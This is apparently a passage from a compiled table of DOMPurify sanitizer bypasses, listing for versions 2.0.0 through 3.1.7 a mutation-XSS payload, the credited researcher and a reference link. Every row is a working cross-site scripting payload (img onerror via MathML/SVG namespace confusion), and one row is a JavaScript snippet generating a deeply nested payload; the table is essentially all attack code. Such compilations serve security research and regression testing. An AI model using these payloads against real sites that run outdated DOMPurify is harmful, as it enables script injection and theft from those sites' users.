| 2.0.0 |
<svg></p><style><a id="</style><img src=1 onerror=alert(1)>"> |
Michał Bentkowski @SecurityMB |
https://research.securitum.com/dompurify-bypass-using-mxss/ |
| 2.0.17 |
<form><math><mtext></form><form><mglyph><style></math><img src onerror=alert(1)> |
Michał Bentkowski @SecurityMB |
https://research.securitum.com/mutation-xss-via-mathml-mutation-dompurify-2-0-17-bypass/ |
| 2.0.17 |
<math><mtext><table><mglyph><style><!--</style><img title="--></mglyph><img	src=1	onerror=alert(1)>"> |
Gareth Heyes @garethheyes |
https://portswigger.net/research/bypassing-dompurify-again-with-mutation-xss |
| 2.0.17 |
<math><mtext><table><mglyph><style><math><table id=”</table>”><img src onerror=alert(1)”> |
@sqrtrev @0xParrot @web_payload team @GuesserSuper |
https://twitter.com/0xsapra/status/1307929537749999616?ref_src=twsrc%5Etfw |
| 2.2.0 |
<form><math><mtext></form><form><mglyph><svg><mtext><style><path id="</style><img onerror=alert(1) src>"> |
Daniel Santos @bananabr |
https://vovohelo.medium.com/from-svg-and-back-yet-another-mutation-xss-via-namespace-confusion-for-dompurify-2-2-2-bypass-5d9ae8b1878f |
| 2.2.3 |
<svg><xss><desc><noscript></noscript></desc><p></p><style><a title="</style><img src onerror=alert(1)>"> |
Michał Bentkowski @SecurityMB |
https://twitter.com/SecurityMB/status/1341290687963262978 |
| 3.0.8 |
<svg><annotation-xml><foreignobject><style><!--</style><p id="--><img src='x' onerror='alert(1)'>"> |
Kévin - Mizu @kevin_mizu |
https://mizu.re/post/playing-with-dompurify-ce-handling |
| 3.1.0 |
n = 506; var payload = `${"<div>".repeat(n)}<table id="outer"><caption id="outer"><svg><desc><table id="inner"><caption id="inner"></caption></table></desc><style><a title="</style><img src onerror=alert(1)>"></a></style></svg></caption></table>${"</div>".repeat(n)}`; |
icesfont |
N/A |
| 3.1.7 |
<svg><a><foreignobject><a><table><a></table><style><!--</style></svg><a id="-><img src onerror=alert(1)>">. |
Masato Kinugawa @kinugawamasato |
https://x.com/kinugawamasato/status/1843687909431582830 |